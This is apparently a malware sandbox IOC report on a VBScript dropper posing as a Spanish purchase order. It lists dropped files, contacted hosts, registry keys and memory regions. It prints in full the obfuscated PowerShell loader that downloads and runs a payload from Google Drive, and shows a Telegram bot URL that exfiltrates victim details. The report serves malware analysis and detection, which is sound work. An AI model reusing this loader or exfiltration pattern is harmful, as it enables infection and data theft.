IOC Report
Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs

loading gif

Files

File Path
Type
Category
Malicious
Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izws5qwu.tyb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pirmaete.q5d.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sytlxl2n.m0d.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwcwhwu0.2bv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Bindehindens.Stu
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://drive.usercontent.googh
unknown
http://drive.google.com
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://chrome.google.com/webstore?hl=en8
unknown
https://github.com/Pester/Pester
unknown
https://reallyfreegeoip.org/xml/173.254.250.90
188.114.96.3
https://www.google.com
unknown
http://checkip.dyndns.org/
193.122.6.168
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 16 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.96.3
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
s-part-0044.t-0009.fb-t-msedge.net
13.107.253.72
drive.google.com
142.250.185.206
drive.usercontent.google.com
142.250.185.65
checkip.dyndns.com
193.122.6.168

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.96.3
reallyfreegeoip.org
European Union
malicious
142.250.185.206
drive.google.com
United States
193.122.6.168
checkip.dyndns.com
United States
142.250.185.65
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
28F64B54000
trusted library allocation
page read and write
malicious
5518000
trusted library allocation
page read and write
malicious
251F1000
trusted library allocation
page read and write
malicious
8160000
direct allocation
page execute and read and write
malicious
89D0000
direct allocation
page execute and read and write
malicious
27380000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
28F54D07000
trusted library allocation
page read and write
20B8F246000
heap
page read and write
28F6D020000
heap
page read and write
9782000
heap
page read and write
7BE0000
trusted library allocation
page read and write
28170000
trusted library allocation
page read and write
24D8E000
stack
page read and write
81B0000
direct allocation
page read and write
27FF0000
trusted library allocation
page read and write
7FF7BFDB3000
trusted library allocation
page execute and read and write
27394000
trusted library allocation
page read and write
7570000
remote allocation
page execute and read and write
28000000
trusted library allocation
page read and write
7F150000
trusted library allocation
page execute and read and write
27880000
trusted library allocation
page read and write
28F52F0D000
heap
page read and write
27380000
trusted library allocation
page read and write
20B9108E000
heap
page read and write
272B6000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
27290000
trusted library allocation
page read and write
20B91084000
heap
page read and write
251D0000
trusted library allocation
page read and write
692A000
stack
page read and write
27FF0000
trusted library allocation
page read and write
254EF000
trusted library allocation
page read and write
20B8F25B000
heap
page read and write
20B8F231000
heap
page read and write
20B8F20D000
heap
page read and write
20B8F213000
heap
page read and write
20B8F231000
heap
page read and write
28E0000
trusted library allocation
page read and write
27296000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
20B9108F000
heap
page read and write
6BA0000
heap
page read and write
2DAA000
trusted library allocation
page execute and read and write
24810000
direct allocation
page read and write
20B8F130000
heap
page read and write
B6394F7000
stack
page read and write
251D0000
trusted library allocation
page read and write
275B5000
heap
page read and write
28020000
trusted library allocation
page read and write
28F56AF5000
trusted library allocation
page read and write
272C2000
trusted library allocation
page read and write
253A1000
trusted library allocation
page read and write
7FF7BFF80000
trusted library allocation
page execute and read and write
28F52E10000
heap
page read and write
251D0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28F56882000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
20B91104000
heap
page read and write
27880000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
25047000
stack
page read and write
2519000
stack
page read and write
70B0000
trusted library allocation
page read and write
D9D0000
direct allocation
page execute and read and write
7FF7BFFD0000
trusted library allocation
page read and write
54C1000
trusted library allocation
page read and write
28150000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
20B91080000
heap
page read and write
8110000
trusted library allocation
page execute and read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
253AB000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
28150000
trusted library allocation
page read and write
27EDE000
stack
page read and write
20B8F25B000
heap
page read and write
8150000
trusted library allocation
page read and write
7090000
trusted library allocation
page read and write
20B8F20B000
heap
page read and write
251D0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
2626C000
trusted library allocation
page read and write
263E4000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
2787E000
stack
page read and write
7F66000
heap
page read and write
6E01000
heap
page read and write
43CE000
stack
page read and write
7FA3000
heap
page read and write
25120000
trusted library allocation
page read and write
A7D0000
direct allocation
page execute and read and write
27FF0000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
6170000
remote allocation
page execute and read and write
2660E000
trusted library allocation
page read and write
B639578000
stack
page read and write
7FF7C0000000
trusted library allocation
page read and write
4A9F000
trusted library allocation
page read and write
2733D000
stack
page read and write
2DBB000
trusted library allocation
page execute and read and write
2D90000
trusted library allocation
page read and write
7FB1000
heap
page read and write
27FF0000
trusted library allocation
page read and write
27E9E000
stack
page read and write
25291000
trusted library allocation
page read and write
28170000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
262FD000
trusted library allocation
page read and write
9587000
heap
page read and write
9690000
heap
page readonly
253D6000
trusted library allocation
page read and write
20B8F1F7000
heap
page read and write
272E0000
trusted library allocation
page read and write
70D0000
